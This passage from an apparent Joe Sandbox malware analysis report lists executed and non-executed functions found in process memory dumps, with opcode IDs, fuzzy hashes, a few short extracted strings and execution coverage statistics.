                Function 06F956C9 Relevance: .0, Instructions: 33COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.2200746487.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f90000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7df2258741ea5f1959e4c2a0eabfbe0379446b9b48d5057cea8a665adf443778
                • Instruction ID: 7275106e7bb30d2f8725170509be526d99fda2031a05c7812204d8d295a3981a
                • Opcode Fuzzy Hash: 7df2258741ea5f1959e4c2a0eabfbe0379446b9b48d5057cea8a665adf443778
                • Instruction Fuzzy Hash: A1F0B43A2143418FDB07AF74D450EE97FB9EF8635131984A6E1448F226DA359842CB90
                Function 06F97E70 Relevance: .0, Instructions: 32COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.2200746487.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f90000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1bcca22b43baf8dcc80a1aee9265b6da48d9e143ea8ecb48abd5eda48cc8a232
                • Instruction ID: e4b5dd50a8444d7e1f1e4da788dcc931cb7951d057be3ea0afc1f9cf9300f320
                • Opcode Fuzzy Hash: 1bcca22b43baf8dcc80a1aee9265b6da48d9e143ea8ecb48abd5eda48cc8a232
                • Instruction Fuzzy Hash: 5DE09B65F243411BEF57365918247EA2FA64BC16E1B060466F604CB290DD64CC0183B1
                Function 06F9503A Relevance: .0, Instructions: 30COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.2200746487.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f90000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4942d7d07b534aad1aad82fc16919d8e2f3e5a4d6366d1c6bc3318a5a2488eb0
                • Instruction ID: c5f80135a720dbe62203cbd373f640ba3ad8a15bb4aefc2a43089c363384c128
                • Opcode Fuzzy Hash: 4942d7d07b534aad1aad82fc16919d8e2f3e5a4d6366d1c6bc3318a5a2488eb0
                • Instruction Fuzzy Hash: DAF01736A1401ADFFF919A69E8497A937F0FB4435EF001065E015971A0CB788986CBB1
                Function 06F956D8 Relevance: .0, Instructions: 29COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.2200746487.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f90000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: cdfaea5aa1d51fccb53e076e39278be8ddebc778fb98e49c8b0a6fe11887fdf2
                • Instruction ID: 36886553df7517d846153391c2c8291184ebb69fc446a8a05d60632391add6fb
                • Opcode Fuzzy Hash: cdfaea5aa1d51fccb53e076e39278be8ddebc778fb98e49c8b0a6fe11887fdf2
                • Instruction Fuzzy Hash: 22F03036310205DBDB05AF29E440DAA3BE9EF893553154465F5048F328DF75EC02CB90
                Function 06F97E80 Relevance: .0, Instructions: 28COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.2200746487.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f90000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 96e1fe10e0ca21f4f3844d90940e542d5418a6ea59170758d265c4b5143a3277
                • Instruction ID: 246e42e05ec818101e6aa21ac9d326d3c39ef21a2d2c4cc3dc31cc35a5927a38
                • Opcode Fuzzy Hash: 96e1fe10e0ca21f4f3844d90940e542d5418a6ea59170758d265c4b5143a3277
                • Instruction Fuzzy Hash: 64E08625F303151B5F9A366D64146BF7A9B8BC45E13150436EA05C7344DE34CC0183F2
                Function 06F93C30 Relevance: .0, Instructions: 26COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.2200746487.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f90000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f65c647d9996bd8e497958ea84487a50d46dc14dd20b600cb34cd1d138cb1366
                • Instruction ID: 6314487eb73556d9f59d6c78c78c034becd95a0d563a67cedcff6bea65a2d2bc
                • Opcode Fuzzy Hash: f65c647d9996bd8e497958ea84487a50d46dc14dd20b600cb34cd1d138cb1366
                • Instruction Fuzzy Hash: 0AE0D831B187608FD7155B38D858BD97BE5AF4AB15F0A40E6E119CB2A3CA644C41C7D1
                Function 06F95680 Relevance: .0, Instructions: 24COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.2200746487.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f90000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d717431ab0b96ac304adba4539dd58ffe882976f4cc5d907426a22bcfff6039b
                • Instruction ID: bb79f4c2de685820684ce7e862540391708a2bc770e61e56905b6cebd8434bc3
                • Opcode Fuzzy Hash: d717431ab0b96ac304adba4539dd58ffe882976f4cc5d907426a22bcfff6039b
                • Instruction Fuzzy Hash: CCF0E535908288BFCB02CBB0C8519CEFF71AF03304F1482D6E55197192CA351A07DF40
                Function 06F94FFE Relevance: .0, Instructions: 20COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.2200746487.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f90000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d3466637f0fefe25fd70468488c5625e8004826afad03d92895e93a0c0a78385
                • Instruction ID: f335c20bbbca30909a409dcc8f951f8f6080c79b61888bf525f6bf5d63bc54f6
                • Opcode Fuzzy Hash: d3466637f0fefe25fd70468488c5625e8004826afad03d92895e93a0c0a78385
                • Instruction Fuzzy Hash: 53E01A36A10016CFDF80DE68E8487EC37B1FB44256F4000A5E015DB1B1CB79D946CFA0
                Function 06F942E0 Relevance: .0, Instructions: 18COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.2200746487.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f90000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d6765a8b95bbbe73fa7f7c07abd7692f2e7e38e58b3a2d21ffac39051ba73cce
                • Instruction ID: 6746c08b157da19936f1c6de758c0790c13de0b362e852e87499fdfd9485bb07
                • Opcode Fuzzy Hash: d6765a8b95bbbe73fa7f7c07abd7692f2e7e38e58b3a2d21ffac39051ba73cce
                • Instruction Fuzzy Hash: 2DD02E36249380AFEB035FA0CC50E813F31AB29200F02A082FA885F1A2C1228853DB21
                Function 06F93C40 Relevance: .0, Instructions: 18COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.2200746487.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f90000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6b5844f8be28c666181e354ee6ee24940606a1a6c65ffb6fee60d28bd985e2e1
                • Instruction ID: a58937a721604a84004589145ff3698bc1ffaa748fe51fd9fbff20da9efa13d6
                • Opcode Fuzzy Hash: 6b5844f8be28c666181e354ee6ee24940606a1a6c65ffb6fee60d28bd985e2e1
                • Instruction Fuzzy Hash: 0FD05B35B145348FDB185B3DD44CBA933D9EB44715F040069E519C7361CE749C00CBD0
                Function 06F9A3B8 Relevance: .0, Instructions: 12COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.2200746487.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f90000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8abe62af4958d9172618d555a4c6afd801a20cf99873e602d71ceebcd5bc72f4
                • Instruction ID: 8ab51fd10970e099519b82307f44fb890fe3ef0f41ddcd45d96bfd910a67ffa3
                • Opcode Fuzzy Hash: 8abe62af4958d9172618d555a4c6afd801a20cf99873e602d71ceebcd5bc72f4
                • Instruction Fuzzy Hash: 90D01230600204CFCB01DBA8EA85C117BA8EF49708358C5A8E0088F233DB73EC42CAA0
                Function 06F942F0 Relevance: .0, Instructions: 11COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.2200746487.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f90000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7c228cb02b177d0a25843113460b94afd46db44dd41ad6be5be89194614ef8f4
                • Instruction ID: 638480f3cff85e1c57c2669f3cceaeb9e4f390813af4b1bce18cac436b6d9eed
                • Opcode Fuzzy Hash: 7c228cb02b177d0a25843113460b94afd46db44dd41ad6be5be89194614ef8f4
                • Instruction Fuzzy Hash: 75C08C36300208BFDB80AFD4D800D96776DAB18720F50E000FF080F211C272E8A2EBA0

                Non-executed Functions

                Function 06F92C38 Relevance: 8.0, Strings: 6, Instructions: 502COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.2200746487.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f90000_x.jbxd
                Similarity
                • API ID:
                • String ID: 4'eq$4'eq$4'eq$4|jq$4|jq$$eq
                • API String ID: 0-3429346994
                • Opcode ID: f9fca1b7c353680ba111fb92554ea4702fcac0f98e95d188b2797ee28e3f3326
                • Instruction ID: 4f1946bb1c710059c64d36790674075fdb254d11d7233c517b540c73f74ab1e5
                • Opcode Fuzzy Hash: f9fca1b7c353680ba111fb92554ea4702fcac0f98e95d188b2797ee28e3f3326
                • Instruction Fuzzy Hash: BD02B532F101159FEF99DF78C894A2E7BA2AF85304B198469E406DB361DF31DD82C7A1
                Function 07D719A8 Relevance: 3.1, Strings: 2, Instructions: 553COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.2201724138.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7d70000_x.jbxd
                Similarity
                • API ID:
                • String ID: PHeq$PHeq
                • API String ID: 0-3382621680
                • Opcode ID: 340b5610f2484961b9f9d843226365b2dfaac0e382bfb68b4e89349847118f3f
                • Instruction ID: acdd3f41c72352bf1c9b40bb7c5f6e1f3faf7d463d26599f1288abd12e998c26
                • Opcode Fuzzy Hash: 340b5610f2484961b9f9d843226365b2dfaac0e382bfb68b4e89349847118f3f
                • Instruction Fuzzy Hash: 3F3217B4B002098FDB18DF69D594AADB7F2BF89301F2541A9E505AB361DB31ED41CB60
                Function 07D72CB8 Relevance: .4, Instructions: 357COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.2201724138.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7d70000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3739c1889102cbce7d60cf6f16f3018880c248d6f88398c31321bad99b5a2a3c
                • Instruction ID: 594620010fca288c32bcfab591e89e2e6153fcaf538047b9478d7bb4c856bc18
                • Opcode Fuzzy Hash: 3739c1889102cbce7d60cf6f16f3018880c248d6f88398c31321bad99b5a2a3c
                • Instruction Fuzzy Hash: 5DD1DEB1B006828FDB29DB75C450BAEB7F6AF88300F14446DD156DB290EF35E906CB61
                Function 06F98C00 Relevance: .3, Instructions: 318COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.2200746487.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f90000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a4b462cbb06229e9a142d56f04a68cce97263816615bb5bd4b33d529d06d9bd1
                • Instruction ID: 2bdc59273ddf7a6ea9039bdb8137f9f2c6d2ef3b834cd20daa8a4a61dd96b99f
                • Opcode Fuzzy Hash: a4b462cbb06229e9a142d56f04a68cce97263816615bb5bd4b33d529d06d9bd1
                • Instruction Fuzzy Hash: 76A191B0B001155FDF89EBB8841577F76ABABC8340F24953D900AEB3D9DE389D4287A1
                Function 06F845F0 Relevance: .3, Instructions: 316COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.2200716482.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f80000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7db94610f0c6786240b20a1afeeecc11a7610d58c5952af45ed4737c590a338a
                • Instruction ID: 49f1b28fe77b46c8d02a06fe5a24fe8541509df82f59316040794a840ca7d413
                • Opcode Fuzzy Hash: 7db94610f0c6786240b20a1afeeecc11a7610d58c5952af45ed4737c590a338a
                • Instruction Fuzzy Hash: 93E1FB74E142198FCB54DFA9C5809AEFBF2FF89304F248169D415AB359D731A942CFA0
                Function 06F8C640 Relevance: .3, Instructions: 312COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.2200716482.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f80000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a201ae93ae89ba5cfcaa480c8c03ef2bd61cac77610fad125a9cf025790495d4
                • Instruction ID: 953c445f3e6ec3de751fb6fa3cba58bb730b4797555891b279dfbdce6bbd15dc
                • Opcode Fuzzy Hash: a201ae93ae89ba5cfcaa480c8c03ef2bd61cac77610fad125a9cf025790495d4
                • Instruction Fuzzy Hash: CAE11874E041198FDB54DFA9C5809AEFBF2FF89304F2481A9D514AB355D731A982CFA0
                Function 06F8E290 Relevance: .3, Instructions: 312COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.2200716482.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f80000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 37b82a6287844863e7a854a7345688745f94ddd197cd479aa0406472ee8bab78
                • Instruction ID: 7cd3f3e94b27f543376ecf252e998e2b2f1780a3c46b10457cde60a6377c3411
                • Opcode Fuzzy Hash: 37b82a6287844863e7a854a7345688745f94ddd197cd479aa0406472ee8bab78
                • Instruction Fuzzy Hash: ECE117B4E102198FDB54DFA9C5809AEFBF2FF89304F2481A9D514AB355D731A982CF60
                Function 06F8C208 Relevance: .3, Instructions: 312COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.2200716482.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f80000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6073f70004afadbe18854934907f25b00715e048166c609de4f65025148b0803
                • Instruction ID: 951bdb92d955376f21598dfbd0d866d2b6e7800173d7adb7d541a91aa6d3a0c0
                • Opcode Fuzzy Hash: 6073f70004afadbe18854934907f25b00715e048166c609de4f65025148b0803
                • Instruction Fuzzy Hash: 13E11774E102198FDB54DFA9C5809AEFBF2FF89304F2481A9D414AB355D731A982CFA0
                Function 06F8BDD0 Relevance: .3, Instructions: 312COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.2200716482.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f80000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: aba4874fe851c253ae91370fd33c947a45e67d30ef620e33acb9939d636e9448
                • Instruction ID: b2d3881694160d6631e4d5a07e7a9c146b50edcd9a44fbd8fedf4f6ff6e375c0
                • Opcode Fuzzy Hash: aba4874fe851c253ae91370fd33c947a45e67d30ef620e33acb9939d636e9448
                • Instruction Fuzzy Hash: 38E12974E002198FDB54DFA9C5809AEFBF2FF89304F2481A9D514AB356C731A982CF60
                Function 06F8D8E0 Relevance: .3, Instructions: 312COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.2200716482.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f80000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7827adaef5523ff4950fcde740f922afdbd4c3ed0b86e6e2816b7f1a41c83839
                • Instruction ID: 6e7a75dae5389daeaf0e85f5c962e7d485f3a0a11e5af7b7da3747a09fcd9693
                • Opcode Fuzzy Hash: 7827adaef5523ff4950fcde740f922afdbd4c3ed0b86e6e2816b7f1a41c83839
                • Instruction Fuzzy Hash: F7E11974E041598FDB54DFA9C5809AEFBF2FF89304F2481A9D414AB356D731A982CFA0
                Function 0119E04C Relevance: .3, Instructions: 264COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.2197628622.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_1190000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2563dc36a9f6f31a37b1b04a5287f926c1bd03d68953ac5e12aa798005f400f8
                • Instruction ID: 7e2f26b27db16589582c749f60a32f9475d788714885862aa069185e8dcaff34
                • Opcode Fuzzy Hash: 2563dc36a9f6f31a37b1b04a5287f926c1bd03d68953ac5e12aa798005f400f8
                • Instruction Fuzzy Hash: DEA18D32E0021ADFCF09DFB4D84449EBBB2FF85304B19456AE915EB265DB31E956CB80
                Function 06F858A8 Relevance: .2, Instructions: 169COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.2200716482.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f80000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 34c75ea3ed1f7d0daa86a427038c3101d6bc037ecb1a9ef9362ea48162e3b771
                • Instruction ID: c733118a50a5bacd2e1f53a3f6a093782f565ed997a3f2aadae6a23f1c7eab30
                • Opcode Fuzzy Hash: 34c75ea3ed1f7d0daa86a427038c3101d6bc037ecb1a9ef9362ea48162e3b771
                • Instruction Fuzzy Hash: F0719074E016188FDB44DFAAC9849DEFBF2BF88310F14D166E819AB215DB34A942CF50
                Function 06F87588 Relevance: .2, Instructions: 157COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.2200716482.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f80000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ce09f691262455ddda6a8a882796914ae57d5e0c1475d7df975befbda8ae01e1
                • Instruction ID: 3f7ae90cc6e86bfaa762e3dcbe7a4aa3065594affccaafccb7865f4fdff55c53
                • Opcode Fuzzy Hash: ce09f691262455ddda6a8a882796914ae57d5e0c1475d7df975befbda8ae01e1
                • Instruction Fuzzy Hash: A8514B4241F7E26EEB03AB3C68B11D67FB08E4325875E54C3C0D0CE4A7E508596ED3AA
                Function 06F85610 Relevance: .1, Instructions: 140COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.2200716482.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f80000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8fe547f7b2820deed3e1a5443364b1e1a74c91145b52b235203bc269078add8b
                • Instruction ID: e6fa81b06d60cba974e848b19d265efe35d5d82f278799a0eb5c4177c77aefc8
                • Opcode Fuzzy Hash: 8fe547f7b2820deed3e1a5443364b1e1a74c91145b52b235203bc269078add8b
                • Instruction Fuzzy Hash: 93519E75D006189FDB44DFEAD8446EEFBB2BF89311F10C02AE819AB254DB345A46CF50
                Function 06F8BDB1 Relevance: .1, Instructions: 139COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.2200716482.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f80000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7763aede49048ed6a08549d4cffbebcab5707229b261d6d4cc9cdd5ca49e4f9a
                • Instruction ID: acbe9ab3b1a9abb9eb7e94112ff8803fba2dc457e80a545d9f01d5873c038f47
                • Opcode Fuzzy Hash: 7763aede49048ed6a08549d4cffbebcab5707229b261d6d4cc9cdd5ca49e4f9a
                • Instruction Fuzzy Hash: EE513B74E042198FDB54DFA9C5809AEFBF2FF89300F2481AAD518A7356D7319942CFA1
                Function 06F8C630 Relevance: .1, Instructions: 137COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.2200716482.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f80000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 02fe231e79083c6ff8ac25d3d754d96a56eb2c88c7cdb2a992ddea07526ab615
                • Instruction ID: a0ef7c865afc87759bbdec31d5d3cba7948c911a25040fc4b551e293bd3ac283
                • Opcode Fuzzy Hash: 02fe231e79083c6ff8ac25d3d754d96a56eb2c88c7cdb2a992ddea07526ab615
                • Instruction Fuzzy Hash: DE512974E142198FDB54DFA9C5809AEFBF2FF89300F2481AAD518AB315D7319942CFA1
                Function 06F8C1F9 Relevance: .1, Instructions: 136COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.2200716482.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f80000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: bb6295d0cb7357d6804130278ed5c47d1ef09428c8fd532ed4aaeaa2e73480d7
                • Instruction ID: eac18843c24be2f5af05cc7313ed97f688c6b8045206692a72af87b880daf88c
                • Opcode Fuzzy Hash: bb6295d0cb7357d6804130278ed5c47d1ef09428c8fd532ed4aaeaa2e73480d7
                • Instruction Fuzzy Hash: D8512974E142198FDB54DFA9C5809AEFBF2FF89300F2481AAD518A7255D7319942CFA0
                Function 06F8E27F Relevance: .1, Instructions: 135COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.2200716482.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f80000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: bbcd180879dc3d04f8dbd685282a00446d564973b5e2f6d35d7428a5c8057f7e
                • Instruction ID: f46710539a6b1e5582e40f34850068d853d0c5b8e5db49a5ac11317a3a208980
                • Opcode Fuzzy Hash: bbcd180879dc3d04f8dbd685282a00446d564973b5e2f6d35d7428a5c8057f7e
                • Instruction Fuzzy Hash: F5512974E102198FDB54DFA9C5809AEFBF2FF89300F2481AAD518AB215D7359D42CFA1
                Function 06F85897 Relevance: .1, Instructions: 135COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.2200716482.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f80000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5ad6431ffe2460cdd3053e3748722b47c12254738bc21041a00058f5e1552171
                • Instruction ID: e4545df31594d10f5270b7835c73297729bf4e718ce4693cdf637e33b0a86eff
                • Opcode Fuzzy Hash: 5ad6431ffe2460cdd3053e3748722b47c12254738bc21041a00058f5e1552171
                • Instruction Fuzzy Hash: 0A51B475E006188FDB48DFAAC98469EFBF2BF88310F14C16AE819AB354DB345946CF50
                Function 06F8D8D1 Relevance: .1, Instructions: 132COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.2200716482.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f80000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2a77836b5f46a7c6f11f233f65271d6fbf1dbf2cdea8cd30b005869fdb189db2
                • Instruction ID: b087a2d88a9c763e8ddaeb259d227e053bb216ad3f30e911b3349f7ad80b6255
                • Opcode Fuzzy Hash: 2a77836b5f46a7c6f11f233f65271d6fbf1dbf2cdea8cd30b005869fdb189db2
                • Instruction Fuzzy Hash: 86513B70E042598FDB54DFA9C5809AEFBF2FF89304F2481AAD418A7356D7319942CFA0
                Function 06F85603 Relevance: .1, Instructions: 101COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.2200716482.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f80000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 84862b9fa3e630b808749bf9ca2fd3c337c081ef71937a830b43978e90d9a9a8
                • Instruction ID: 59439e907f1c08d586a69f418f1fd7fa96b2709e8ee88b74c467853205968c24
                • Opcode Fuzzy Hash: 84862b9fa3e630b808749bf9ca2fd3c337c081ef71937a830b43978e90d9a9a8
                • Instruction Fuzzy Hash: 5941B5B5E006189FDB48DFEAC8446DEFBF2AF89300F14C06AE419AB254DB345A46CF50
                Function 06F9FE52 Relevance: 5.1, Strings: 4, Instructions: 106COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.2200746487.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f90000_x.jbxd
                Similarity
                • API ID:
                • String ID: @$@$B$B
                • API String ID: 0-685577651
                • Opcode ID: d006f5ca08b8e0fb0b1c740d194f29f9d7f222dbbd768d5862ac2acc7d41984d
                • Instruction ID: bae9a3251b77694290687209ac2fbccb9e8fe0a0e37e44bbbe3349b2cd9b6705
                • Opcode Fuzzy Hash: d006f5ca08b8e0fb0b1c740d194f29f9d7f222dbbd768d5862ac2acc7d41984d
                • Instruction Fuzzy Hash: 5131F476F016058FEF64DF6DD8848AEBBF0FF892287244666E119C7661D730D801CBA0

                Execution Graph

                Execution Coverage:1%
                Dynamic/Decrypted Code Coverage:4.6%
                Signature Coverage:4.6%
                Total number of Nodes:109
                Total number of Limit Nodes:11
